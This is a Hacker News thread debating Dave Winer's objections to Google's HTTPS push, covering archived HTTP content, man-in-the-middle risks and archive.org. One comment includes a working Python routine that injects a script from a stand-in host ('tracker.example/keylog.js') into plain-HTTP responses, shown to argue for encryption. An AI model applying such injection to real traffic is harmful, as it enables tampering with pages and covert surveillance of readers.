Hacker News

> HTTPS is an open standard. Google doesn't control it. HTTPS doesn't require anyone to use any Google product.

The problem is that Google controls the most popular interfaces for consuming HTTP and HTTPS, i.e. their Chrome browser and their search engine. So Google is in a position to control how these protocols are consumed, which is the crux of Dave's argument. Google is already discouraging the use of HTTP through warning messages in Chrome and by penalizing HTTP sites in its search ranking algorithms. Dave's concern is that Google will "turn off" HTTP access the same way it did with RSS: capture the market for consuming RSS feeds, then shut down Google Reader and remove discoverability of RSS feeds from Chrome.

Dave Winer has been around the Web for longer than most and you'd be foolish to write him off as a curmudgeon. Dave is to the open Web what RMS is to FOSS.




It is immensely frustrating to me that Dave's excellent point about legacy content is obscured by his characterization of the push to HTTPS. At the core, the idea that security only matters for transactions is wrong. For example, I want my blog to be served over HTTPS because I don't want anyone to be able to edit my words between my server and the person reading them.

Now, Dave acknowledges this: "They tell us to worry about man-in-the-middle attacks that might modify content, but fail to mention that they can do it in the browser, even if you use a 'secure' protocol."

The rhetorical slip here is bad. "They" is me. I say you should worry about man-in-the-middle attacks. I can't "do it in the browser." He keeps doing this; he's acting like Google is the only entity that thinks the move is a good idea.

It also fails to acknowledge that partial solutions matter! What, I should give up on putting locks on my door just because the lock manufacturer can go right through them? Further, right now I have a choice of three plausible browsers, and I can switch between them freely. There's a significant difference between the danger of man-in-the-middle attacks and the danger of a browser-level attack. (Both pretty low, to be fair, but still.)

And that's just the concern about attacks. Tracking is a whole additional issue that he doesn't acknowledge.

So, yeah, he makes some good points. But since he won't engage in discussion on the topic, they're not useful and they get drowned out by the noise.


won't engage in discussion -- it's been a long day, lots of discussion, and most of it repetitive. The fact that so much discussion is needed is a pretty good indication that the open web should not be corporatized. Google should create a new medium, like they did with AMP, and make it opt-in. Stop trying to be the dictator of the web. And you -- please stop saying bullshit about me. Thanks. Tired.


> Dave is to the open Web what RMS is to FOSS.

This is a great analogy!


Thank you, that's a very nice thing to say. Over the years I've come to respect Stallman's way of viewing things more and more.

The open web is worth fighting for. And Google is moving into new territory now, by deciding to force sites to switch to HTTPS. Most of the arguments you hear are about new sites, but people are missing that the web has been used for 25 years as an archiving medium. If you want to save something so it's available for others (and yourself too) in the future, put it on the web. It's been an incredibly stable platform, far more so than the ones run by the tech industry, and precisely because it isn't run by the tech industry.

That's about to change.

Read the original post. Today's post is just a continuation of that one.

http://this.how/googleAndHttp/

And be a little more kind to Stallman. :-)

Dave


With all due respect, I read the original post, and it does not seem terribly compelling to me.

> Something bad could happen to my pages in transit from a server to the user's web browser.

This already happens. Verizon injects tracking cookies into unencrypted requests [1]. Hotels inject advertising on top of the existing advertising [personal experience]. They will do it when I read your blog archive from 2001. They will inject arbitrary JavaScript that records my every keystroke and mouse movement [2]. State actors will use persistent surveillance of all unencrypted cookies to pierce firewalls and target individual engineers in charge of anything they happen to find useful [3]. They will do worse things as compute becomes cheaper and cheaper.
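To make concrete how little stands in the way of this: plain HTTP has no integrity protection, so any on-path party can rewrite a response body before it reaches the browser. A minimal sketch of the splice (the tracker URL and page are hypothetical, chosen only for illustration):

```python
def inject_script(response_body: bytes, script_url: bytes) -> bytes:
    """Sketch of what any on-path party (ISP, hotel Wi-Fi, state actor)
    can do to a plain-HTTP response: splice a <script> tag in before the
    closing </body> tag. Nothing in HTTP itself detects or prevents this;
    the TLS layer in HTTPS is what makes it infeasible."""
    tag = b'<script src="' + script_url + b'"></script>'
    # Inject before </body> if the page has one, otherwise just append.
    if b"</body>" in response_body:
        return response_body.replace(b"</body>", tag + b"</body>", 1)
    return response_body + tag

# A perfectly innocent archived page, tampered with in transit:
page = b"<html><body><p>My 2001 blog post</p></body></html>"
tampered = inject_script(page, b"http://tracker.example/keylog.js")
print(tampered.decode())
```

The reader's browser executes the injected script exactly as if the author had shipped it, which is why "it's just a static archive" is no defense.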

If your argument is that there are lots of HTTP sites that are historically important and also that are unmaintained and that will never be upgraded, okay. That is a solvable technical problem [4].

If you want to know why you have to force people to do it, it is because security is a public health issue [5]. It is the same reason you have to force people to get vaccinations.

I don't work for Google (in fact I work for a direct competitor), and I disagree with a lot of the things that they do or want to do (unsurprisingly). But having more security on the web is not one of them. We live in a very different world than we did 25-plus years ago.

[1] https://www.eff.org/deeplinks/2014/11/verizon-x-uidh

[2] https://www.wired.com/story/the-dark-side-of-replay-sessions...

[3] https://theintercept.com/2014/12/13/belgacom-hack-gchq-insid... (search for MUTANT BROTH)

[4] https://archive.org/

[5] https://www.schneier.com/blog/archives/2014/03/security_as_a...


I generally agree with you, but I do not think that [4] is the solution for maintaining history. Archive.org is great, but the average user doesn't know how to get there once the base URL stops working.

Maybe we need proxies as close to the origin servers as possible, to minimize the amount of traffic passing over insecure links. That seems like a political nightmare, but...


I didn't claim [4] was the solution. I claimed the problem was solvable. One example of how to improve on [4] is to build into browsers the option of automatically searching archive.org whenever you hit a 404.
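One way to prototype that fallback: the Internet Archive exposes an availability endpoint (https://archive.org/wayback/available) that returns the closest snapshot for a given URL as JSON. A sketch of what a browser or extension could do on a 404 (no live network call here; the sample reply below is hand-built to mirror the API's shape, and the snapshot URL in it is illustrative):

```python
import json
from typing import Optional
from urllib.parse import urlencode

AVAILABILITY_API = "https://archive.org/wayback/available"

def availability_query(dead_url: str) -> str:
    """Build the archive.org availability query for a URL that 404'd."""
    return AVAILABILITY_API + "?" + urlencode({"url": dead_url})

def closest_snapshot(api_response: str) -> Optional[str]:
    """Pull the closest archived snapshot URL out of the JSON reply,
    or None if the page was never archived."""
    data = json.loads(api_response)
    snap = data.get("archived_snapshots", {}).get("closest", {})
    return snap["url"] if snap.get("available") else None

# Hand-built sample reply in the shape the availability API returns:
sample = json.dumps({
    "archived_snapshots": {
        "closest": {
            "available": True,
            "url": "http://web.archive.org/web/20010801000000/http://scripting.com/",
            "timestamp": "20010801000000",
        }
    }
})
print(availability_query("http://scripting.com/"))
print(closest_snapshot(sample))
```

On a real 404 the browser would fetch the query URL, parse the reply with `closest_snapshot`, and offer to redirect the user to the snapshot if one exists.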


Naturally, that feature already exists as a Firefox extension. Making it more visible would be awesome.

https://addons.mozilla.org/en-US/firefox/addon/resurrect-pag...


That doesn't solve the discoverability problem for good, as the 404ing links will themselves be removed after a while; what we really need is a good search engine for the archives.

Of course, the whole point of this article is that centralisation of important resources is risky. Archive.org is an essential resource, and it's really far too important to be at the sole mercy of the Internet Archive organisation, well meaning and admirable in every way though they are.


I don't disagree. There are alternatives to archive.org [6]. There are ways to decentralize centralized services. I'm sure you can think of many more ways to do better than what is done. I mostly linked to https://archive.org because of the "https" in the URL. My point is that there are technical solutions to the technical problem of preserving history that do not require weakening the security of the whole internet.

[6] https://archive.is/


I am in very strong agreement, and apologize for nitpicking.


The solution is do nothing. Leave it the fuck alone.



